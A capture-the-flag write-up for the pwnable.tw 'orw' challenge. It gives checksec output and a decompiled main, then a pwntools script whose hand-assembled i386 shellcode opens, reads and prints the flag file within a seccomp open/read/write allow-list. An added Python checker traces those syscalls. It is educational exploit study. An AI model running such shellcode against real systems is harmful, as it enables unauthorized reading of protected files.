checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
description
int __cdecl main(int argc, const char **argv, const char **envp)
{
    orw_seccomp();
    printf("Give my your shellcode:");
    read(0, &shellcode, 0xC8u);
    (shellcode)();
    return 0;
}
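The program reads shellcode from the user and executes it.
seccomp is applied; checking the rule shows that open, read, and write are allowed, so, as the challenge name suggests, we just need to write an orw (open/read/write) shellcode.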
exploit code
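from pwn import *

p = remote("chall.pwnable.tw", 10001)
ru = lambda a : p.recvuntil(a)

# read(0, 0x804a100, 0xf): receive the flag path from stdin
sc = b"\xb8\x03\x00\x00\x00"    # mov eax, 3 (read)
sc += b"\xbb\x00\x00\x00\x00"   # mov ebx, 0 (stdin)
sc += b"\xb9\x00\xa1\x04\x08"   # mov ecx, 0x804a100 (buffer)
sc += b"\xba\x0f\x00\x00\x00"   # mov edx, 0xf (length of the path incl. NUL)
sc += b"\xcd\x80"               # int 0x80

# open(0x804a100, ...): ecx and edx keep their values from the previous call
sc += b"\xbb\x00\xa1\x04\x08"   # mov ebx, 0x804a100 (path)
sc += b"\xb8\x05\x00\x00\x00"   # mov eax, 5 (open)
sc += b"\xcd\x80"               # int 0x80

# read(fd, 0x804a100, 0x50): read the file contents into the buffer
sc += b"\x89\xc3"               # mov ebx, eax (fd returned by open)
sc += b"\xb8\x03\x00\x00\x00"   # mov eax, 3 (read)
sc += b"\xb9\x00\xa1\x04\x08"   # mov ecx, 0x804a100
sc += b"\xba\x50\x00\x00\x00"   # mov edx, 0x50
sc += b"\xcd\x80"               # int 0x80

# write(1, 0x804a100, 0x50): print the buffer to stdout
sc += b"\xb8\x04\x00\x00\x00"   # mov eax, 4 (write)
sc += b"\xbb\x01\x00\x00\x00"   # mov ebx, 1 (stdout)
sc += b"\xb9\x00\xa1\x04\x08"   # mov ecx, 0x804a100
sc += b"\xba\x50\x00\x00\x00"   # mov edx, 0x50
sc += b"\xcd\x80"               # int 0x80

# Pad with NOPs to the 200 (0xC8) bytes that main() reads
sc += b"\x90" * (200 - len(sc))

ru(b":")
p.send(sc)
sleep(0.1)
# Consumed by the shellcode's first read(): 15 bytes including the NUL
p.send(b"/home/orw/flag\x00")
p.interactive()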
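Added example, not part of the original post: a small static check that decodes the shellcode bytes above (only the three instruction forms they use) and lists each int 0x80 call against the open/read/write allow-list described in the write-up. The function names and the ALLOWED set are assumptions made for this illustration; the actual filter installed by orw_seccomp() is not shown on the page.

```python
import struct

# i386 int 0x80 syscall numbers that appear in this write-up
SYSCALLS = {3: "read", 4: "write", 5: "open"}
ALLOWED = {"open", "read", "write"}  # allow-list as described in the write-up (assumed)
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # x86 encoding order

# Shellcode bytes copied from the exploit above (NOP padding omitted)
SC = bytes.fromhex(
    "b803000000 bb00000000 b900a10408 ba0f000000 cd80"
    "bb00a10408 b805000000 cd80"
    "89c3 b803000000 b900a10408 ba50000000 cd80"
    "b804000000 bb01000000 b900a10408 ba50000000 cd80"
)

def trace_syscalls(code):
    """Return (name, ebx, ecx, edx) for every int 0x80; None means unknown statically."""
    regs = dict.fromkeys(REGS, None)
    calls, i = [], 0
    while i < len(code):
        op = code[i]
        if 0xB8 <= op <= 0xBF:                      # mov r32, imm32
            regs[REGS[op - 0xB8]] = struct.unpack_from("<I", code, i + 1)[0]
            i += 5
        elif op == 0x89 and i + 1 < len(code) and code[i + 1] >= 0xC0:
            modrm = code[i + 1]                     # mov r/m32, r32 (register form)
            regs[REGS[modrm & 7]] = regs[REGS[(modrm >> 3) & 7]]
            i += 2
        elif code[i:i + 2] == b"\xcd\x80":          # int 0x80
            name = SYSCALLS.get(regs["eax"], f"sys_{regs['eax']}")
            calls.append((name, regs["ebx"], regs["ecx"], regs["edx"]))
            regs["eax"] = None                      # return value is not known statically
            i += 2
        elif op == 0x90:                            # nop
            i += 1
        else:
            raise ValueError(f"unsupported opcode {op:#x} at offset {i}")
    return calls

def violations(calls):
    """Names of traced syscalls that fall outside the allow-list."""
    return [c[0] for c in calls if c[0] not in ALLOWED]

if __name__ == "__main__":
    fmt = lambda v: "?" if v is None else hex(v)
    for name, ebx, ecx, edx in trace_syscalls(SC):
        print(f"{name}({fmt(ebx)}, {fmt(ecx)}, {fmt(edx)})")
    print("outside allow-list:", violations(trace_syscalls(SC)))
```

The trace also shows that the open call receives the buffer address 0x804a100 in ecx as its flags argument, because that register is not reset after the first read.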